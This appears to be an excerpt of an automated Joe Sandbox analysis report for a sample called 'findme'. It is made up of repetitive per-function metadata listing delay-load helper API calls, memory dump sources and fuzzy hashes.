                    • Opcode Fuzzy Hash: 2482df2ecb0af31ff4172e7f9e7ece1204f8a0e5a16302da43e63d77fa9fbb42
                    • Instruction Fuzzy Hash: ABB0129D77C10ABC32081216BC2FD37022CD4C1B14730412FB105D018099485C4D403F
                    Function 004DDBDE Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                    Download Yara Rule
                    APIs
                    • ___delayLoadHelper2@8.DELAYIMP ref: 004DDBD5
                      • Part of subcall function 004DDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004DDFD6
                      • Part of subcall function 004DDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004DDFE7
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                    • String ID:
                    • API String ID: 1269201914-0
                    • Opcode ID: dcfb13b0def68880f11b7abc6dfe4b7af886f11b422088318479a3e840faf5b2
                    • Instruction ID: 54bbf3a3ad887c4d2be8cb160aeebd61fe30bd8ea5aba823dd882aef9c37963a
                    • Opcode Fuzzy Hash: dcfb13b0def68880f11b7abc6dfe4b7af886f11b422088318479a3e840faf5b2
                    • Instruction Fuzzy Hash: 25B0129D76C005BC3108522ABC2FF37026CE4C1F14730402FB11AC0280D9485C0D403E
                    Function 004DDBE8 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                    Download Yara Rule
                    APIs
                    • ___delayLoadHelper2@8.DELAYIMP ref: 004DDBD5
                      • Part of subcall function 004DDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004DDFD6
                      • Part of subcall function 004DDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004DDFE7
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                    • String ID:
                    • API String ID: 1269201914-0
                    • Opcode ID: 2c713e9862f858fab22cbf777d6822654d945bcc6c7c58a49c814826dc1fe94c
                    • Instruction ID: a2674e5e5524f8464d62bb81a86d592dc1e2834d78102b0b1c474e88ca6bb865
                    • Opcode Fuzzy Hash: 2c713e9862f858fab22cbf777d6822654d945bcc6c7c58a49c814826dc1fe94c
                    • Instruction Fuzzy Hash: EEB0129D76D006FC310C521ABC2FE37027CD5C1B14730801FB509C1284D9485C0D403F
                    Function 004DDBFC Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                    Download Yara Rule
                    APIs
                    • ___delayLoadHelper2@8.DELAYIMP ref: 004DDBD5
                      • Part of subcall function 004DDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004DDFD6
                      • Part of subcall function 004DDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004DDFE7
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                    • String ID:
                    • API String ID: 1269201914-0
                    • Opcode ID: be9a2a37d47614511db534744a95c95540fab1f57db37e8f3d338c7620b1abeb
                    • Instruction ID: e026b99cdd5389b00e8d1517d13cd45b8f5c1b3839c87c7dce1be32ce2f18e64
                    • Opcode Fuzzy Hash: be9a2a37d47614511db534744a95c95540fab1f57db37e8f3d338c7620b1abeb
                    • Instruction Fuzzy Hash: A8B0129D76C006BC310C521ABD2FE37066CD4C1B14730801FB209C0280D9485C0A403F
                    Function 004DDC5D Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                    Download Yara Rule
                    APIs
                    • ___delayLoadHelper2@8.DELAYIMP ref: 004DDC36
                      • Part of subcall function 004DDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004DDFD6
                      • Part of subcall function 004DDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004DDFE7
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                    • String ID:
                    • API String ID: 1269201914-0
                    • Opcode ID: 63be2b903b6dbf6f0af94521b17857ebaf3868bb4a82461b52d9608e7cf40cdf
                    • Instruction ID: cc1e58a6e95853e745c53deed07bb7f6ce1d1fb4c5ef5af3639edccce63d8e97
                    • Opcode Fuzzy Hash: 63be2b903b6dbf6f0af94521b17857ebaf3868bb4a82461b52d9608e7cf40cdf
                    • Instruction Fuzzy Hash: 7FB012A9A7C2017C310C6345FC26E36067CD4C1F10B30451FB209D0280D6885C09803E
                    Function 004DDC53 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                    Download Yara Rule
                    APIs
                    • ___delayLoadHelper2@8.DELAYIMP ref: 004DDC36
                      • Part of subcall function 004DDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004DDFD6
                      • Part of subcall function 004DDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004DDFE7
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                    • String ID:
                    • API String ID: 1269201914-0
                    • Opcode ID: 7d9e83ac97d0ba78fef9307730b68dd503a91605e2c505a8c24af9380ee7e09e
                    • Instruction ID: 400e6487c824d1b590665cfa548119f5b5f41650c992d5077f50ba2113766ad2
                    • Opcode Fuzzy Hash: 7d9e83ac97d0ba78fef9307730b68dd503a91605e2c505a8c24af9380ee7e09e
                    • Instruction Fuzzy Hash: F1B012A9A7C1017C310C6345FC26E36067CC4C6F10B30851FB609D0280D6885C09803E
                    Function 004DDC24 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                    Download Yara Rule
                    APIs
                    • ___delayLoadHelper2@8.DELAYIMP ref: 004DDC36
                      • Part of subcall function 004DDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004DDFD6
                      • Part of subcall function 004DDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004DDFE7
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                    • String ID:
                    • API String ID: 1269201914-0
                    • Opcode ID: d0823b8646db6e5336111dfe16caed5e0571414c504c1c7d2b9a34f9889346ed
                    • Instruction ID: d9e0765b9348cc92742f58f3d41daa9fc9cf9b7cf2b0f973b1459b779dea3603
                    • Opcode Fuzzy Hash: d0823b8646db6e5336111dfe16caed5e0571414c504c1c7d2b9a34f9889346ed
                    • Instruction Fuzzy Hash: 19B012A9A7C2057C310C2341FE26D36063DC5C1F10B30461FB205E018096885C49903E
                    Function 004DD8D9 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                    Download Yara Rule
                    APIs
                    • ___delayLoadHelper2@8.DELAYIMP ref: 004DD8A3
                      • Part of subcall function 004DDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004DDFD6
                      • Part of subcall function 004DDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004DDFE7
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                    • String ID:
                    • API String ID: 1269201914-0
                    • Opcode ID: b56a73ef2448602c1fbc9ac95fd018a98f87a3dad966f6a338adc43f0b77789c
                    • Instruction ID: d4164b4ff19dfbdfb1e8fe8695f3d77c2066cec992a66051709352062259ec60
                    • Opcode Fuzzy Hash: b56a73ef2448602c1fbc9ac95fd018a98f87a3dad966f6a338adc43f0b77789c
                    • Instruction Fuzzy Hash: 44A012D196C0027C30093201EC26D36021CC4C2B14330440FB006901C094482805143E
                    Function 004DD95B Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                    Download Yara Rule
                    APIs
                    • ___delayLoadHelper2@8.DELAYIMP ref: 004DD8A3
                      • Part of subcall function 004DDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004DDFD6
                      • Part of subcall function 004DDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004DDFE7
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                    • String ID:
                    • API String ID: 1269201914-0
                    • Opcode ID: ba8a4211581413898bc2534179ee786a9f8e6ab8791713b1b871ab4ac08c9b53
                    • Instruction ID: d4164b4ff19dfbdfb1e8fe8695f3d77c2066cec992a66051709352062259ec60
                    • Opcode Fuzzy Hash: ba8a4211581413898bc2534179ee786a9f8e6ab8791713b1b871ab4ac08c9b53
                    • Instruction Fuzzy Hash: 44A012D196C0027C30093201EC26D36021CC4C2B14330440FB006901C094482805143E
                    Function 004DD951 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                    Download Yara Rule
                    APIs
                    • ___delayLoadHelper2@8.DELAYIMP ref: 004DD8A3
                      • Part of subcall function 004DDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004DDFD6
                      • Part of subcall function 004DDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004DDFE7
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                    • String ID:
                    • API String ID: 1269201914-0
                    • Opcode ID: e273bf536a5b046ec9f6b28bcd4a9327255f1664e327b49ddaeb56801e073e07
                    • Instruction ID: d4164b4ff19dfbdfb1e8fe8695f3d77c2066cec992a66051709352062259ec60
                    • Opcode Fuzzy Hash: e273bf536a5b046ec9f6b28bcd4a9327255f1664e327b49ddaeb56801e073e07
                    • Instruction Fuzzy Hash: 44A012D196C0027C30093201EC26D36021CC4C2B14330440FB006901C094482805143E
                    Function 004DD96F Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                    Download Yara Rule
                    APIs
                    • ___delayLoadHelper2@8.DELAYIMP ref: 004DD8A3
                      • Part of subcall function 004DDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004DDFD6
                      • Part of subcall function 004DDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004DDFE7
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                    • String ID:
                    • API String ID: 1269201914-0
                    • Opcode ID: f69fce2507b41a41ec3bbfd3b1041eb132d28c45644fd31b745b69f41f553ca3
                    • Instruction ID: d4164b4ff19dfbdfb1e8fe8695f3d77c2066cec992a66051709352062259ec60
                    • Opcode Fuzzy Hash: f69fce2507b41a41ec3bbfd3b1041eb132d28c45644fd31b745b69f41f553ca3
                    • Instruction Fuzzy Hash: 44A012D196C0027C30093201EC26D36021CC4C2B14330440FB006901C094482805143E
                    Function 004DD965 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                    Download Yara Rule
                    APIs
                    • ___delayLoadHelper2@8.DELAYIMP ref: 004DD8A3
                      • Part of subcall function 004DDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004DDFD6
                      • Part of subcall function 004DDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004DDFE7
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                    • String ID:
                    • API String ID: 1269201914-0
                    • Opcode ID: 2cb26e7498c8f31f0c7928a62737cdb764f4cde626527df40fc4edba5059ce93
                    • Instruction ID: d4164b4ff19dfbdfb1e8fe8695f3d77c2066cec992a66051709352062259ec60
                    • Opcode Fuzzy Hash: 2cb26e7498c8f31f0c7928a62737cdb764f4cde626527df40fc4edba5059ce93
                    • Instruction Fuzzy Hash: 44A012D196C0027C30093201EC26D36021CC4C2B14330440FB006901C094482805143E
                    Function 004DD979 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                    Download Yara Rule
                    APIs
                    • ___delayLoadHelper2@8.DELAYIMP ref: 004DD8A3
                      • Part of subcall function 004DDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004DDFD6
                      • Part of subcall function 004DDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004DDFE7
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                    • String ID:
                    • API String ID: 1269201914-0
                    • Opcode ID: c5533f927777f0fb2ea7702f9cb40c8a2bd4cbde8a22881a0e7e65f158e84026
                    • Instruction ID: d4164b4ff19dfbdfb1e8fe8695f3d77c2066cec992a66051709352062259ec60
                    • Opcode Fuzzy Hash: c5533f927777f0fb2ea7702f9cb40c8a2bd4cbde8a22881a0e7e65f158e84026
                    • Instruction Fuzzy Hash: 44A012D196C0027C30093201EC26D36021CC4C2B14330440FB006901C094482805143E
                    Function 004DD91F Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                    Download Yara Rule
                    APIs
                    • ___delayLoadHelper2@8.DELAYIMP ref: 004DD8A3
                      • Part of subcall function 004DDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004DDFD6
                      • Part of subcall function 004DDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004DDFE7
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                    • String ID:
                    • API String ID: 1269201914-0
                    • Opcode ID: e1e3af30139cc9b21d58eb340634c6c7ec312b9d50a007a45bc036616ec2e25b
                    • Instruction ID: d4164b4ff19dfbdfb1e8fe8695f3d77c2066cec992a66051709352062259ec60
                    • Opcode Fuzzy Hash: e1e3af30139cc9b21d58eb340634c6c7ec312b9d50a007a45bc036616ec2e25b
                    • Instruction Fuzzy Hash: 44A012D196C0027C30093201EC26D36021CC4C2B14330440FB006901C094482805143E
                    Function 004DD93D Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                    Download Yara Rule
                    APIs
                    • ___delayLoadHelper2@8.DELAYIMP ref: 004DD8A3
                      • Part of subcall function 004DDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004DDFD6
                      • Part of subcall function 004DDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004DDFE7
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                    • String ID:
                    • API String ID: 1269201914-0
                    • Opcode ID: 88b2c13b5fc1809b7205de5900f38c4fc25febea969940fd98e79a5d7923568b
                    • Instruction ID: d4164b4ff19dfbdfb1e8fe8695f3d77c2066cec992a66051709352062259ec60
                    • Opcode Fuzzy Hash: 88b2c13b5fc1809b7205de5900f38c4fc25febea969940fd98e79a5d7923568b
                    • Instruction Fuzzy Hash: 44A012D196C0027C30093201EC26D36021CC4C2B14330440FB006901C094482805143E
                    Function 004DD98D Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                    Download Yara Rule
                    APIs
                    • ___delayLoadHelper2@8.DELAYIMP ref: 004DD8A3
                      • Part of subcall function 004DDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004DDFD6
                      • Part of subcall function 004DDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004DDFE7
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                    • String ID:
                    • API String ID: 1269201914-0
                    • Opcode ID: 62d403f478e1e2bd86ab120f8f8e0d147606880319951333e043659bddaf0261
                    • Instruction ID: d4164b4ff19dfbdfb1e8fe8695f3d77c2066cec992a66051709352062259ec60
                    • Opcode Fuzzy Hash: 62d403f478e1e2bd86ab120f8f8e0d147606880319951333e043659bddaf0261
                    • Instruction Fuzzy Hash: 44A012D196C0027C30093201EC26D36021CC4C2B14330440FB006901C094482805143E
                    Function 004DD983 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                    Download Yara Rule
                    APIs
                    • ___delayLoadHelper2@8.DELAYIMP ref: 004DD8A3
                      • Part of subcall function 004DDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004DDFD6
                      • Part of subcall function 004DDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004DDFE7
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
